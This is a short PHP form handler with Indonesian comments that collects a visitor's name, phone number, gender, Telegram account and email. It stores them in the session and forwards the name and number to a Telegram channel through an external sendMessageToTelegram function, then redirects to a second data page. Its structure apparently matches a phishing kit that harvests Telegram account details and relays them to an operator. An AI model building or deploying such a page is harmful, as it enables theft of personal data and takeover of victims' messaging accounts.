<?php
session_start(); // Mulai session untuk menyimpan data dan membaca session sebelumnya

// Ambil data dari form
$nama = $_POST['nama'];
$nomor_telepon = $_POST['nomor_telepon'];
$gender = $_POST['gender'];
$telegram_account = $_POST['telegram_account'];
$email = $_POST['email'];

// Validasi input
if (empty($nama) || empty($nomor_telepon) || empty($gender) || empty($telegram_account) || empty($email)) {
    echo "Semua kolom harus diisi.";
    exit();
}

// Pastikan nomor telepon dimulai dengan +62, jika tidak, tambahkan
if (substr($nomor_telepon, 0, 1) === '0') {
    $nomor_telepon = '+62' . substr($nomor_telepon, 1); // Ganti awalan '0' dengan '+62'
} elseif (!preg_match('/^\+62/', $nomor_telepon)) {
    $nomor_telepon = '+62' . $nomor_telepon; // Tambahkan +62 jika tidak ada
}

// Simpan data dari form ke session
$_SESSION['nama'] = $nama;
$_SESSION['nomor_telepon'] = $nomor_telepon;
$_SESSION['gender'] = $gender;
$_SESSION['telegram_account'] = $telegram_account;
$_SESSION['email'] = $email;

// Ambil data dari session untuk lokasi, divisi, dan role
$location = isset($_SESSION['location']) ? $_SESSION['location'] : 'Tidak diisi';
$division = isset($_SESSION['division']) ? $_SESSION['division'] : 'Tidak diisi';
$role = isset($_SESSION['role']) ? $_SESSION['role'] : 'Tidak diisi';

// Format pesan yang akan dikirim ke Telegram
$message .= "╠➥ Nama: $nama\n";
$message .= "║\n";
$message .= "╠➥ Nomer: $nomor_telepon\n";
$message .= "║\n";


// Panggil fungsi kirim pesan ke Telegram dari file telegram.php
require '../telegram.php';
sendMessageToTelegram($message); // Panggil fungsi yang sudah ada di telegram.php

// Redirect setelah pengiriman
header('Location: ../data2.html');
exit();
?>
